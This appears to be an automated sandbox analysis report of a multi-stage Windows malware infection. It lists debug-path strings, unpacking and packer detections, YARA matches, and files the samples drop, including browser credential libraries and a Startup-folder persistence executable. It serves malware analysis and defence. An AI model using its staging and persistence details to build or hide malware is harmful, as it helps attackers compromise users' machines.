Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: .pdb.dbg source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdbGCTL source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003F38000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003649000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000C7A000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: ntdll.pdb source: dialer.exe, 00000022.00000003.2190774257.000001B8F6500000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: dialer.exe, 00000022.00000003.2201377378.000001B8F63D0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3182406330.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Serialize.pdb source: 3FF8.exe, 00000012.00000000.2046476160.0000000000ED2000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 907.exe, 00000006.00000002.1919407201.0000000004BBC000.00000004.00000800.00020000.00000000.sdmp, 907.exe, 00000006.00000002.1919407201.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, 4BEF.exe, 0000001C.00000002.2463972164.0000000006F06000.00000004.00000800.00020000.00000000.sdmp, 4BEF.exe, 0000001C.00000002.2463972164.0000000007091000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: dialer.exe, 00000022.00000003.2209743343.000001B8F65F0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2203687364.000001B8F6310000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Unpacked PE file: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.6.unpack .text:ER;.rdata:R;.data:W;.tutewi:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Unpacked PE file: 17.2.toolspub2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.zomoxol:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Unpacked PE file: 36.2.7D14.exe.330000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

Unpacked PE file: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.6.unpack

Yara detected Costura Assembly Loader

Source: Yara match	File source: 37.2.9234.exe.1c552b80.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.9234.exe.1c540000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.9234.exe.1c110000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.9234.exe.1c540000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000002.3048629503.000000001C110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2797802024.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3065308983.000000001C540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: 907.exe.1.dr

Static PE information: 0x99297DA6 [Tue Jun 6 02:59:50 2051 UTC]

Source: C:\Users\user\AppData\Local\Temp\907.exe

Code function: 6_2_6F88B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

6_2_6F88B6C0

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: A203.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x58cc2
Source: 617D.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x5980e
Source: 907.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x4a19ec
Source: ABF7.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8a630
Source: 4BEF.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x53e437
Source: 9234.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x3832d7
Source: W73PCbSH71.exe	Static PE information: real checksum: 0xcfb7 should be: 0xd30a

Source: 7D14.exe.1.dr	Static PE information: section name:
Source: 7D14.exe.1.dr	Static PE information: section name:
Source: 7D14.exe.1.dr	Static PE information: section name:
Source: 7D14.exe.1.dr	Static PE information: section name: .themida
Source: 7D14.exe.1.dr	Static PE information: section name: .boot
Source: ABF7.exe.1.dr	Static PE information: section name: .8EAN

Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8DCC2B push ecx; ret	6_2_6F8DCC3E
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8DD565 push ecx; ret	6_2_6F8DD578
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_06164F0C pushfd ; retf	6_2_06164F15
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_06163AC7 push dword ptr [esp+ecx*2-75h]; ret	6_2_06163ACB
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_061618E0 push 01EB05D5h; ret	6_2_061618F2
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004038CD push ecx; ret	14_2_004038E0
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00551977 push ebx; iretd	14_2_005519B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00551970 push ebx; iretd	14_2_005519B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0055198B push ebx; iretd	14_2_005519B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_005931DD pushad ; iretd	14_2_005931E3
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_005949FE push ss; retf	14_2_00594A36
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0059498B push ss; retf	14_2_00594A36
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00594AAB pushfd ; ret	14_2_00594AC5
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0058E351 push ebx; iretd	14_2_0058E37C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0058E33C push ebx; iretd	14_2_0058E37C
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Code function: 15_2_029D9C85 pushad ; ret	15_2_029D9C97
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Code function: 15_2_029D716B pushfd ; ret	15_2_029D71B3
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Code function: 15_2_029D9D61 pushad ; ret	15_2_029D9D88
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_004011D0 push ebx; iretd	17_2_00401217
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_004011D7 push ebx; iretd	17_2_00401217
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_004011EB push ebx; iretd	17_2_00401217
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_004065B8 push 004065F5h; ret	19_2_004065ED
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_004040B5 push eax; ret	19_2_004040F1
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_00408104 push ecx; mov dword ptr [esp], eax	19_2_00408109
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_00404185 push 00404391h; ret	19_2_00404389
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_00404206 push 00404391h; ret	19_2_00404389
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_0040C218 push eax; ret	19_2_0040C219
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_004042E8 push 00404391h; ret	19_2_00404389
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_00404283 push 00404391h; ret	19_2_00404389
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_00408F38 push 00408F6Bh; ret	19_2_00408F63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0044524C push edi; ret	21_2_0044524D

Source: initial sample	Static PE information: section name: .text entropy: 7.070222172340171
Source: initial sample	Static PE information: section name: entropy: 7.977888588281988
Source: initial sample	Static PE information: section name: .text entropy: 7.669683784686144
Source: initial sample	Static PE information: section name: .text entropy: 7.848440097799385
Source: initial sample	Static PE information: section name: .text entropy: 7.9935872126747025

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\explorer.exe

System file written: C:\Users\user\AppData\Local\Temp\3613.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassalac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libmp4v2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3613.exe	File created: C:\Users\user\AppData\Local\Temp\etopt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassflac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2pcmt.dll (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A203.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libsox-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Local\Temp\nss49BB.tmp\Zip.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AR2HV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libvorbis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OEQUH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\takdec.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\tak_deco_lib.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3613.exe	File created: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-57NTO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	File created: C:\Users\user\AppData\Local\Temp\nsu43C0.tmp\INetC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-I6VL6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9EPE2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MTV1E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TFV9B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MRQQI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\907.exe	File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\907.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-J8ET1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MEVM4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-M2T3E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassopus.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8S45S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\uchardet.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3613.exe	File created: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_tta.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Local\Temp\nss49BB.tmp\Checker.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-0MOHV.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9234.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	File created: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\syncUpd[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DEI4I.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MSLFL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\ff_helper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\dstt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libsoxr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-IE8CS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AKKJ0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3613.exe	File created: C:\Users\user\AppData\Local\Temp\tuc4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	File created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-28DPF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\basscd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\rg_ebur128.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TCA78.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-V58DU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L2GUL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\OptimFROG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DFBO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\utils.dll (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5A58.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N7BK8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QDL6V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\basswma.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassdsd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\sd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-ER2T6.tmp	Jump to dropped file
